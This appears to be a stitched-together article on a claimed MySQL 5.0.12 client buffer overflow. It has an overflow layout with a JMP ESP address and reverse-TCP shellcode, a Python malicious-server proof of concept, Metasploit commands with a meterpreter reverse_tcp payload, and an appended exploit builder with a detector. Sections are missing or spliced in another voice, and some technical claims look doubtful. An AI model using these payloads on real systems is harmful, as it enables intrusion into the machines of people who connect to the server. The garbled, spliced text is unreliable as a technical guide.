Introduction: Why a 20-Year-Old Bug Still Matters

In the world of cybersecurity, few pieces of software have stood the test of time like MySQL. Originally released in the mid-1990s, MySQL became the backbone of millions of web applications, from small WordPress blogs to massive enterprise systems. By 2005, version 5.0.12 was a landmark release, introducing views, stored procedures, and triggers. But it also introduced something else: a critical vulnerability that would echo through penetration testing manuals for a decade.

An attacker-controlled server can crash the client application or, more dangerously, execute arbitrary code on the client machine.

Part 2: Technical Deep Dive – How the Overflow Works

The Affected Code (Simplified)

While the full source of MySQL 5.0.12 is available, the critical segment looks roughly like this (pseudocode reconstructed from analysis):

The overflow string that overwrites the saved return address is laid out as follows:

    [ padding to offset 264 ] [ 0x7C86467B ] [ NOP × 200 ] [ shellcode (reverse TCP) ]
                                 // JMP ESP in kernel32.dll

When the vulnerable function returns, the overwritten address sends execution to the JMP ESP instruction in kernel32.dll. At that moment ESP points at the bytes immediately after the return address, so the jump lands in the NOP sled and slides into the shellcode, which gives the attacker a command shell on the victim's machine with the permissions of the application that called MySQL (often SYSTEM or a web server user). Two practical constraints follow from this layout: the version string is NUL-terminated, so the padding, return address, sled and shellcode must all be free of 0x00 bytes; and 0x7C86467B is only valid for the particular kernel32.dll build it was taken from, so the address must be re-verified against the target's copy of the DLL before use.

This exploit is not a remote server compromise in the traditional sense. Instead, it turns the client into the victim. Here is how an attacker would leverage it:

Scenario A: Malicious MySQL Server

An attacker hosts a MySQL server on a public IP, say evil-mysql.com:3306. Then they use social engineering, SQL injection, or configuration files to trick a developer's tool (e.g., mysql.exe, mysqldump, a PHP script using mysql_connect()) into connecting to that server.

A minimal proof-of-concept server that sends the oversized version string:

    import socket
    import struct

    version = b"1" * 500  # overflow trigger: far longer than any real "5.0.12-log"
    # protocol version 10, the version string (NUL-terminated by the filler), then zero
    # filler for the remaining fields (full protocol packet building omitted for brevity)
    body = b"\x0a" + version + b"\x00" * 20
    # every MySQL packet carries a 3-byte little-endian length and a 1-byte sequence id;
    # the handshake is sequence 0, and a client discards a packet that has no header
    packet = struct.pack("<I", len(body))[:3] + b"\x00" + body

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restarts
    s.bind(("0.0.0.0", 3306))
    s.listen(1)
    conn, addr = s.accept()
    print(f"client connected from {addr[0]}:{addr[1]}, sending {len(packet)}-byte handshake")
    conn.sendall(packet)  # sendall: a bare send() may deliver only part of the buffer
    conn.close()
    s.close()

If the client (mysql -h malicious_host -u root) crashes, it is vulnerable.

The Metasploit Framework historically included:

    use auxiliary/server/mysql/mysql_yassl_hello
    set SRVHOST 0.0.0.0
    set PAYLOAD windows/meterpreter/reverse_tcp
    exploit

When a MySQL client connects, the module delivers the overflow and returns a shell. Confirm the module path with search mysql_yassl in msfconsole before relying on it, since module names and locations move between Framework releases.

Snort or Suricata rules could flag suspicious handshake packets with a version string longer than 255 bytes. Example detection logic:
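The malicious handshake from Scenario A and the detection check in the last paragraph, carried into working code as an added example (this is not code from the original page): it builds the protocol-10 handshake a 5.0-era server sends, a version string laid out for the JMP ESP return described above, and a parser that flags any handshake whose version string exceeds 255 bytes or contains non-printable bytes. Assumptions: the 0xCC bytes stand in for real shellcode, the scramble bytes, thread id and capability flags are constructed values, and the non-printable-byte heuristic is an addition of mine, not something the page states.

```python
import struct

# Values from the page: the overwritten return address sits at byte 264 of the
# version string and is the JMP ESP in kernel32.dll the article quotes.
RET_OFFSET = 264
JMP_ESP_KERNEL32 = 0x7C86467B
MAX_VERSION_LEN = 255          # longest version string the detector tolerates (page's threshold)

# Constructed stand-in for shellcode: 0xCC (int3) breakpoints, NUL-free so a
# strcpy-style copy does not stop early. Real shellcode is an assumption, not on the page.
FAKE_SHELLCODE = b"\xcc" * 32


def build_overflow_string(shellcode: bytes = FAKE_SHELLCODE, nop_count: int = 200) -> bytes:
    """Overflow string for a JMP ESP return: padding up to the saved EIP, the
    kernel32 JMP ESP address, then the NOP sled and shellcode that ESP points at
    once the ret instruction has popped the overwritten address."""
    if b"\x00" in shellcode:
        raise ValueError("shellcode must be NUL-free: the version string ends at the first NUL")
    return (b"A" * RET_OFFSET
            + struct.pack("<I", JMP_ESP_KERNEL32)   # little-endian, lands in EIP
            + b"\x90" * nop_count
            + shellcode)


def build_handshake(server_version: bytes, thread_id: int = 7, seq: int = 0) -> bytes:
    """Protocol-10 handshake in the field order a 5.0-era server sends, length-prefixed."""
    body = (b"\x0a"                           # protocol version 10
            + server_version + b"\x00"        # NUL-terminated server version string
            + struct.pack("<I", thread_id)    # connection id
            + b"a" * 8 + b"\x00"              # scramble part 1 + filler (constructed bytes)
            + struct.pack("<H", 0xF7FF)       # server capability flags (constructed)
            + b"\x21"                         # charset: utf8_general_ci
            + struct.pack("<H", 0x0002)       # status: SERVER_STATUS_AUTOCOMMIT
            + b"\x00" * 13                    # filler
            + b"b" * 12 + b"\x00")            # scramble part 2 + NUL (constructed bytes)
    return struct.pack("<I", len(body))[:3] + bytes([seq & 0xFF]) + body


def parse_handshake(packet: bytes) -> dict:
    """Parse the packet header and the fields up to and including the version string."""
    if len(packet) < 5:
        raise ValueError("packet too short for a MySQL header")
    length = int.from_bytes(packet[:3], "little")
    body = packet[4:4 + length]
    if length == 0 or len(body) != length:
        raise ValueError("declared length does not match bytes on the wire")
    if body[0] != 0x0A:
        raise ValueError(f"unexpected protocol version {body[0]}")
    nul = body.find(b"\x00", 1)
    if nul < 0:
        raise ValueError("version string is not NUL-terminated")
    return {"seq": packet[3], "version": body[1:nul],
            "thread_id": int.from_bytes(body[nul + 1:nul + 5], "little")}


def inspect_handshake(packet: bytes) -> tuple:
    """Detection logic: returns (suspicious, reason). Implements the page's
    'version string longer than 255 bytes' rule plus a non-printable-byte heuristic
    (a NOP sled or shellcode never looks like '5.0.12-log')."""
    try:
        info = parse_handshake(packet)
    except ValueError as exc:
        return True, f"malformed handshake: {exc}"
    version = info["version"]
    if len(version) > MAX_VERSION_LEN:
        return True, f"server version string is {len(version)} bytes (> {MAX_VERSION_LEN})"
    if any(b < 0x20 or b > 0x7E for b in version):
        return True, "server version string contains non-printable bytes"
    return False, f"ok: {version.decode()} (thread id {info['thread_id']})"


# Constructed sample traffic: one benign handshake and two hostile ones.
BENIGN = build_handshake(b"5.0.12-log")
CRASH_TRIGGER = build_handshake(b"1" * 500)        # the page's crash test
EXPLOIT = build_handshake(build_overflow_string())  # full JMP ESP layout

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("crash", CRASH_TRIGGER), ("exploit", EXPLOIT)):
        print(f"{name:8s} {len(pkt):4d} bytes -> {inspect_handshake(pkt)}")
```

Running the file prints one verdict per sample; the benign handshake passes, the 500-byte crash trigger and the JMP ESP payload are both caught by the length rule alone, and a truncated or headerless packet is reported as malformed rather than silently skipped. The same parse-then-judge split is what a Suricata rule approximates with a content match on the 0x0a protocol byte followed by a distance check for the NUL terminator.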